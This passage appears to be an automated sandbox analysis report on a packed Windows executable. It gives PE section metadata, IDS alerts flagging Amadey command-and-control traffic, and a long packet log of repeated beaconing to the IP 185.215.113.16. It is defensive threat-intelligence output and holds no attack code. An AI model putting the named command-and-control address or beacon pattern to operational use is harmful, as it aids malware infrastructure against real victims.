	0x1000	0x68000	0x2de00	dc59c5b8e2d919b69560d19a4ce219bc	False	0.9974508259536785	OpenPGP Public Key	7.982355367742593	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	ffb5d5409b71685f3a099b9b15f8767e	False	0.578125	data	4.530262538151211	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2b8000	0x200	dac3755964989485aa14fcebbd1efeb4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
aosdyjib	0x323000	0x1a7000	0x1a6400	b49632a5c89154bcf079d734e63401ff	False	0.9943002053730018	data	7.955301660952693	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ttauocqi	0x4ca000	0x1000	0x600	4125af4f26f5ed0bdc28e12e88ef3377	False	0.5462239583333334	data	4.815255135471417	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4cb000	0x3000	0x2200	b392d5e8fc622fae13e55efcba783853	False	0.06387867647058823	DOS executable (COM)	0.745067519382054	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4c9088	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T20:59:31.436749+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	51103	20.12.23.50	192.168.2.6
2024-07-26T20:59:05.168665+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49699	80	192.168.2.6	185.215.113.16
2024-07-26T20:59:12.810336+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49706	40.127.169.103	192.168.2.6
2024-07-26T20:59:32.438755+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	51105	20.12.23.50	192.168.2.6
2024-07-26T20:59:17.974952+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49717	80	192.168.2.6	185.215.113.16
2024-07-26T20:59:06.351188+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49700	80	192.168.2.6	185.215.113.16

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 20:59:03.946652889 CEST	49699	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:03.951591969 CEST	80	49699	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:03.951663017 CEST	49699	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:03.951773882 CEST	49699	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:03.956549883 CEST	80	49699	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:05.168243885 CEST	80	49699	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:05.168586969 CEST	80	49699	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:05.168664932 CEST	49699	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:05.170865059 CEST	49699	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:05.175967932 CEST	80	49699	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:05.433532953 CEST	80	49699	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:05.433763981 CEST	49699	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:05.548113108 CEST	49699	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:05.548451900 CEST	49700	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:05.560940027 CEST	80	49700	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:05.560955048 CEST	80	49699	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:05.561064959 CEST	49699	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:05.561077118 CEST	49700	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:05.561290979 CEST	49700	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:05.568454027 CEST	80	49700	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:06.351094007 CEST	80	49700	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:06.351187944 CEST	49700	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:06.351958990 CEST	49700	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:06.356884956 CEST	80	49700	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:06.606599092 CEST	80	49700	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:06.606703997 CEST	49700	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:06.719954014 CEST	49700	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:06.720371962 CEST	49701	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:06.726691961 CEST	80	49700	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:06.726872921 CEST	49700	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:06.726882935 CEST	80	49701	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:06.726972103 CEST	49701	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:06.727173090 CEST	49701	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:06.733504057 CEST	80	49701	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:07.535132885 CEST	80	49701	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:07.535214901 CEST	49701	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:07.536278009 CEST	49701	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:07.549854040 CEST	80	49701	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:07.806822062 CEST	80	49701	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:07.807051897 CEST	49701	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:07.923226118 CEST	49701	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:07.923548937 CEST	49702	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:07.954974890 CEST	80	49702	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:07.956955910 CEST	49702	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:07.956955910 CEST	49702	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:07.958190918 CEST	80	49701	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:07.958359957 CEST	49701	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:07.961836100 CEST	80	49702	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:08.716974974 CEST	80	49702	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:08.717116117 CEST	49702	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:08.717758894 CEST	49702	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:08.722981930 CEST	80	49702	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:09.033060074 CEST	80	49702	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:09.033152103 CEST	49702	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:09.141679049 CEST	49702	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:09.141980886 CEST	49703	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:09.147413015 CEST	80	49703	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:09.147483110 CEST	49703	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:09.147656918 CEST	49703	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:09.148591995 CEST	80	49702	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:09.148647070 CEST	49702	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:09.153306007 CEST	80	49703	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:09.888726950 CEST	80	49703	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:09.888809919 CEST	49703	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:09.889708996 CEST	49703	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:09.895087957 CEST	80	49703	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:10.137224913 CEST	80	49703	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:10.137301922 CEST	49703	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:10.250926971 CEST	49703	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:10.251205921 CEST	49704	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:10.256151915 CEST	80	49704	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:10.256247044 CEST	49704	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:10.256383896 CEST	49704	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:10.256715059 CEST	80	49703	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:10.256776094 CEST	49703	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:10.261275053 CEST	80	49704	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:11.053632021 CEST	80	49704	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:11.053838968 CEST	49704	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:11.054737091 CEST	49704	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:11.061542988 CEST	80	49704	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:11.302748919 CEST	80	49704	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:11.302798986 CEST	49704	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:11.407198906 CEST	49704	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:11.407494068 CEST	49708	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:11.412373066 CEST	80	49708	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:11.412507057 CEST	49708	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:11.412678003 CEST	49708	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:11.412688017 CEST	80	49704	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:11.412746906 CEST	49704	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:11.417485952 CEST	80	49708	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:12.245943069 CEST	80	49708	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:12.246722937 CEST	49708	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:12.246722937 CEST	49708	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:12.252633095 CEST	80	49708	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:12.502916098 CEST	80	49708	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:12.504511118 CEST	49708	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:12.612114906 CEST	49710	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:12.612510920 CEST	49708	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:12.625417948 CEST	80	49710	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:12.625514030 CEST	49710	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:12.625777006 CEST	49710	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:12.634780884 CEST	80	49708	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:12.634865046 CEST	49708	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:12.635410070 CEST	80	49710	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:13.428133965 CEST	80	49710	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:13.428203106 CEST	49710	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:13.436844110 CEST	49710	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:13.443109989 CEST	80	49710	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:13.689023972 CEST	80	49710	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:13.689100981 CEST	49710	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:13.798367023 CEST	49710	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:13.798795938 CEST	49714	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:13.808448076 CEST	80	49714	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:13.811306000 CEST	49714	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:13.811487913 CEST	49714	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:13.812731028 CEST	80	49710	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:13.812877893 CEST	49710	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:13.819690943 CEST	80	49714	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:14.559926987 CEST	80	49714	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:14.561019897 CEST	49714	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:14.561880112 CEST	49714	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:14.566879034 CEST	80	49714	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:14.808888912 CEST	80	49714	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:14.817511082 CEST	49714	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:14.923207998 CEST	49714	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:14.923660994 CEST	49715	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:14.928966999 CEST	80	49715	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:14.929059029 CEST	49715	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:14.929208994 CEST	49715	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:14.929563999 CEST	80	49714	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:14.929622889 CEST	49714	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:14.934427977 CEST	80	49715	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:15.678265095 CEST	80	49715	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:15.678358078 CEST	49715	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:15.679366112 CEST	49715	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:15.684454918 CEST	80	49715	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:15.942840099 CEST	80	49715	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:15.943058968 CEST	49715	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:16.047677040 CEST	49715	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:16.048042059 CEST	49716	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:16.053165913 CEST	80	49716	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:16.053277969 CEST	49716	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:16.053364038 CEST	49716	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:16.054805040 CEST	80	49715	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:16.054872990 CEST	49715	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:16.061712027 CEST	80	49716	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:16.804059982 CEST	80	49716	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:16.804171085 CEST	49716	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:16.805102110 CEST	49716	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:16.809995890 CEST	80	49716	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:17.097984076 CEST	80	49716	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:17.098088980 CEST	49716	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:17.204041004 CEST	49716	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:17.210047960 CEST	80	49716	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:17.210129023 CEST	49716	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:17.212181091 CEST	49717	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:17.217104912 CEST	80	49717	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:17.217183113 CEST	49717	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:17.217320919 CEST	49717	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:17.222837925 CEST	80	49717	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:17.974831104 CEST	80	49717	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:17.974951982 CEST	49717	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:17.975611925 CEST	49717	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:17.980572939 CEST	80	49717	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:18.225573063 CEST	80	49717	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:18.225737095 CEST	49717	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:18.329166889 CEST	49717	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:18.329478979 CEST	49718	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:18.334671974 CEST	80	49718	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:18.334791899 CEST	49718	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:18.334990025 CEST	49718	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:18.335597992 CEST	80	49717	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:18.335652113 CEST	49717	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:18.340624094 CEST	80	49718	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:19.122694969 CEST	80	49718	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:19.122843027 CEST	49718	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:19.123709917 CEST	49718	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:19.128505945 CEST	80	49718	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:19.375066996 CEST	80	49718	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:19.375219107 CEST	49718	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:19.485443115 CEST	49718	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:19.485758066 CEST	49719	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:19.490629911 CEST	80	49719	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:19.490796089 CEST	49719	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:19.490911007 CEST	80	49718	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:19.491050959 CEST	49718	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:19.491379976 CEST	49719	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:19.496206045 CEST	80	49719	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:20.281785965 CEST	80	49719	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:20.282078981 CEST	49719	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:20.282890081 CEST	49719	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:20.288091898 CEST	80	49719	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:20.543345928 CEST	80	49719	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:20.543595076 CEST	49719	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:20.658140898 CEST	49719	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:20.658428907 CEST	49720	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:20.663289070 CEST	80	49720	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:20.663410902 CEST	49720	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:20.663645029 CEST	80	49719	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:20.663717031 CEST	49719	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:20.663923979 CEST	49720	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:20.669610977 CEST	80	49720	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:21.412055016 CEST	80	49720	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:21.412144899 CEST	49720	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:21.415652037 CEST	49720	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:21.420804977 CEST	80	49720	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:21.671369076 CEST	80	49720	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:21.671474934 CEST	49720	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:21.783030033 CEST	49720	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:21.783484936 CEST	49721	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:21.788775921 CEST	80	49721	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:21.788881063 CEST	49721	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:21.789062977 CEST	49721	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:21.789299965 CEST	80	49720	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:21.789371014 CEST	49720	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:21.794023037 CEST	80	49721	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:22.565438986 CEST	80	49721	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:22.565538883 CEST	49721	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:22.566241980 CEST	49721	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:22.571108103 CEST	80	49721	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:22.830981970 CEST	80	49721	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:22.831058025 CEST	49721	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:22.939064026 CEST	49721	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:22.939476013 CEST	49722	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:22.946106911 CEST	80	49722	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:22.946219921 CEST	49722	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:22.946376085 CEST	49722	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:22.961138010 CEST	80	49722	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:22.977982044 CEST	80	49721	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:22.978060007 CEST	49721	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:23.721822977 CEST	80	49722	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:23.721925974 CEST	49722	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:23.722713947 CEST	49722	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:23.727591038 CEST	80	49722	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:23.971482038 CEST	80	49722	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:23.971697092 CEST	49722	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:24.079356909 CEST	49722	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:24.079632998 CEST	49723	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:24.086585999 CEST	80	49723	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:24.086707115 CEST	49723	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:24.086798906 CEST	80	49722	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:24.086853981 CEST	49722	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:24.087443113 CEST	49723	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:24.092969894 CEST	80	49723	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:24.839623928 CEST	80	49723	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:24.839795113 CEST	49723	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:24.840555906 CEST	49723	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:24.845401049 CEST	80	49723	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:25.089128971 CEST	80	49723	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:25.089391947 CEST	49723	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:25.204041004 CEST	49723	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:25.204349041 CEST	49724	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:25.209383011 CEST	80	49723	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:25.209489107 CEST	49723	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:25.210736990 CEST	80	49724	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:25.210832119 CEST	49724	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:25.211030006 CEST	49724	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:25.215868950 CEST	80	49724	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:26.012787104 CEST	80	49724	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:26.012912035 CEST	49724	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:26.013551950 CEST	49724	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:26.018448114 CEST	80	49724	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:26.261593103 CEST	80	49724	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:26.261713028 CEST	49724	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:26.376032114 CEST	49724	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:26.376372099 CEST	49725	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:26.381438971 CEST	80	49725	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:26.381530046 CEST	49725	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:26.381643057 CEST	80	49724	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:26.381644964 CEST	49725	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:26.381697893 CEST	49724	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:26.386552095 CEST	80	49725	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:27.143990040 CEST	80	49725	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:27.144182920 CEST	49725	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:27.144716978 CEST	49725	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:27.149626970 CEST	80	49725	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:27.395840883 CEST	80	49725	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:27.396035910 CEST	49725	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:27.500977039 CEST	49725	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:27.501091003 CEST	51099	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:27.505939007 CEST	80	51099	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:27.506014109 CEST	51099	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:27.506100893 CEST	51099	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:27.506696939 CEST	80	49725	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:27.506752014 CEST	49725	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:27.510968924 CEST	80	51099	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:28.273273945 CEST	80	51099	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:28.273490906 CEST	51099	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:28.274797916 CEST	51099	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:28.279817104 CEST	80	51099	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:28.553694963 CEST	80	51099	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:28.553834915 CEST	51099	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:28.657830000 CEST	51099	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:28.658308029 CEST	51101	80	192.168.2.6	185.215.113.16
